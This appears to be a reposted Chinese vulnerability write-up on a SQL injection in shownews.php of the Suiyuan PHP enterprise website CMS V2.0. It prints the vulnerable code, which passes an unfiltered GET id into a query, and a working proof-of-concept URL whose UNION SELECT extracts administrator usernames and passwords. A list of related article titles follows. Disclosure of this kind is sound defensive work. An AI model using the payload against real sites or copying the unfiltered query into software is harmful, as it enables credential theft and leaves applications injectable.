随缘php企业网站管理系统V2.0 shownews.php注入漏洞
来源:互联网 发布:linux系统api接口 编辑:程序博客网 时间:2024/05/16 16:06
程序名称:随缘网络php企业网站管理系统2.0免费版
以下为系统的功能简介:
1、采用div+css布局经测试兼容IE及firefox主流浏览器,其他浏览器暂未测试。
2、产品新闻三级无限分类。
3、后台可设置诸如管理员帐号密码,网站标题,网站底部版权等信息。
4、后台采用最新版xhEditor编辑器,xhEditor是一个基于jQuery开发的跨平台开源迷你XHTML编辑器组件。
5、后台图片栏目可以对相关的幻灯,友情链接,logo,banner等进行修改设置。
5、后台可批量删除产品新闻。
漏洞文件 shownews.php,以下是程序部分代码:
<?php include_once("wzdy.php");if(isset($_GET['id'])) //检测id变量是否设置{ $id=$_GET["id"];} else{ echo "<script language='javascript'>"; echo "alert('请输入正确ID!');"; echo " location='index.php';"; echo "</script>"; exit;} $sql4="select * from news where id=$id"; //未经过滤将id变量直接带入sql查询语句中,输出到$sql4变量中 $result4=mysql_query($sql4); //将$sql4变量赋值到$result4变量中 if($nums=mysql_num_rows($result4)) //返回$result4变量结果,意味着$title变量,$content变量会显示出我们构造的恶意注入语句结果 { $rs4=mysql_fetch_array($result4); $title=$rs4["title"]; $content=$rs4["content"]; $hits=$rs4["hits"]; $fbsj=date("Y-m-d",strtotime($rs4['fbsj'])); $sql="update news set hits=hits+1 where id=$id"; mysql_query($sql); } else {echo "<script language='javascript'>"; echo "alert('请输入正确ID!');";echo " location='index.php';"; echo "</script>";exit; }?>
漏洞poc:
http://192.168.1.5/websitetempeltest/qywphp2/shownews.php?id=5 and 1=2 UNION SELECT 1,2,unhex(hex(concat(0x5e5e5e,username,0x7c,password,0x5e5e5e))),4,5,6,7 from gly
0 0
- 随缘php企业网站管理系统V2.0 shownews.php注入漏洞
- BOSSI 公司(企业)网站管理系统注入&上传漏洞利用
- 随缘学校管理系统cookie欺骗漏洞
- 千博企业网站管理系统HitCount.Asp页面注入漏洞
- WMCMS企业网站管理系统(PHP+Mysql)源码
- Phpcms V9 网站管理系统 SQL 盲注入漏洞
- PHP代码网站如何防范SQL注入漏洞攻击建议
- PHP代码网站如何防范SQL注入漏洞攻击建议
- PHP企业建站自助管理系统
- Php动态函数注入漏洞
- 解析PHP对象注入漏洞
- 企业综合管理系统 V2.0 版本 使用说明
- 【转】免费php网站后台管理系统
- 织梦 - PHP开源网站管理系统
- 动易网站管理系统vote.asp页面存在SQL注入漏洞
- wdcp虚拟主机管理系统注入漏洞
- PHP网络开发详解:SQL注入漏洞
- PHP防注入漏洞过滤函数
- 先行发生原则(Happens-before)
- SketchUp又名“草图大师”
- ICMP协议
- 大家好。
- Java 欧拉工程 第二十一篇【计算10000以下所有相亲数之和】
- 随缘php企业网站管理系统V2.0 shownews.php注入漏洞
- iOS项目中使用iconfont
- spring 注解
- 数据库(第一范式,第二范式,第三范式)
- UVa 10298 - Power Strings
- BlueDroid代码分析之GKI
- oracle创建用户 创建表空间 导出表和导入表
- java泛型
- ExpandableListView---多级树形菜单